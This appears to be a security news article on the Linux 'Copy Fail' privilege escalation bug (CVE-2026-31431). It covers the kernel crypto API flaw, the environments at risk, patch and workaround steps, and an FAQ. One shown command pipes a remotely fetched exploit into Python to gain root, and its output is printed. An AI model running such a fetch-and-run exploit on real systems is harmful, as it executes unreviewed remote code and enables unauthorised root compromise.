Copy Fail Vulnerability Roots Any Linux Since 2017

Key Takeaways

• A single 732-byte Python script can root any Linux distribution shipped since 2017
• The vulnerability exploits a logic bug in the kernel crypto API that has existed for nearly a decade
• Shared environments like CI/CD runners, container hosts, and dev boxes face the highest risk

What Is Copy Fail?

Security researchers have disclosed CVE-2026-31431, nicknamed 'Copy Fail.' It is a local privilege escalation vulnerability that affects every mainstream Linux distribution released since 2017. Unlike most Linux LPE bugs that require race conditions or kernel-specific offsets, Copy Fail is a straight-line logic flaw. The same 732-byte Python script achieves root access on Ubuntu, Fedora, Debian, Arch, Rocky, Alma, Oracle Linux, and embedded systems.

The bug lives in authencesn, a component of the kernel crypto API. Attackers chain it through AF_ALG and splice() to achieve a 4-byte page-cache write. This primitive has been silently exploitable for nearly a decade.

Why This Vulnerability Is Different

Most local privilege escalation bugs require specific conditions. Maybe the attacker needs to win a race. Maybe they need kernel debugging features enabled. Maybe they need to know exact memory offsets for the target kernel version.

Copy Fail requires none of these. The researchers demonstrated the same exploit binary working unmodified across four different Linux distributions in a single recording. The requirements are minimal: an unprivileged local user account. No network access needed. No kernel debugging features. No pre-installed primitives.

The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro's default configuration. This means the entire 2017-to-patch window is exploitable out of the box on fresh installs.

Who Is Vulnerable?

The researchers outline several high-risk scenarios:

• Shared dev boxes, shell-as-a-service platforms, jump hosts, and build servers where multiple users share a kernel
• Container and Kubernetes environments, because the page cache is shared across the host. A pod with the right primitives can compromise the node and cross tenant boundaries
• CI/CD infrastructure including GitHub Actions self-hosted runners, GitLab runners, and Jenkins agents that execute untrusted PR code as a regular user
• AI and ML platforms like notebook hosts, agent sandboxes, serverless functions, and any environment running tenant-supplied containers or scripts

Who Is Not at Immediate Risk?

Single-tenant production environments where only your team has shell access face lower immediate risk. You are already the only user. The bug does not grant remote attackers access by itself. However, any local code execution path becomes a root path. A web app RCE plus Copy Fail equals full system compromise.

How the Exploit Works

The vulnerability stems from a 2017 optimization in algif_aead that allowed in-place operations. The researchers explain that this change created a condition where page-cache pages could end up in a writable destination scatterlist. Through AF_ALG and splice(), an attacker can write 4 bytes to the page cache. The proof-of-concept targets /usr/bin/su by default, though any setuid binary works.

$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)

The PoC is written in Python 3.10+ using only standard library modules (os, socket, zlib). The researchers also provide a non-destructive checker that detects whether algif_aead is loadable and whether your kernel still has the vulnerable scratch-write path. The checker does not escalate privileges.

How to Patch

Update your distribution's kernel package to one that includes mainline commit a664bf3d603d. This commit reverts the 2017 algif_aead in-place optimization, preventing page-cache pages from ending up in the writable destination scatterlist. Most major distributions are shipping the fix now.

If you cannot patch immediately, disable the algif_aead module:

# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true

What does this break? For the vast majority of systems, nothing measurable. The algif_aead module handles authenticated encryption for the kernel crypto API. Most userspace applications do not rely on it directly.

Tracking and Resources

The researchers published the PoC to help defenders verify their systems and validate vendor patches. The issue tracker is available at github.com/theori-io/copy-fail-CVE-2026-31431. If you have tested the vulnerability on distributions not yet listed, the researchers invite you to open an issue.

Frequently Asked Questions

Does CVE-2026-31431 affect all Linux distributions?

Yes. Any Linux distribution with a kernel built between 2017 and the patch is vulnerable. This includes Ubuntu, Debian, Fedora, Arch, Rocky, Alma, Oracle Linux, and embedded systems.

Can CVE-2026-31431 be exploited remotely?

No. The bug requires local access with an unprivileged user account. However, any remote code execution vulnerability combined with Copy Fail becomes a root compromise.

What kernel commit fixes Copy Fail?

Mainline commit a664bf3d603d reverts the vulnerable 2017 algif_aead optimization. Check your distribution's security advisories for the patched kernel version.

Is there a workaround if I cannot patch immediately?

Yes. Disable the algif_aead module by adding 'install algif_aead /bin/false' to /etc/modprobe.d/disable-algif.conf and unloading the module with rmmod.

Are containers protected from Copy Fail?

No. The page cache is shared across the host. A container with the ability to load kernel modules or access AF_ALG can exploit the vulnerability and cross tenant boundaries.

Source: Hacker News: Best / Xint

Discovery Details and Technical Mechanism

The new article identifies the discovery team (Theori) and reveals the specific vulnerability mechanism involving a 4-byte write to the page cache via 'AF_ALG' and 'splice()' calls. It also provides a disclosure timeline, noting the flaw was reported on March 23 and patches were released within a week.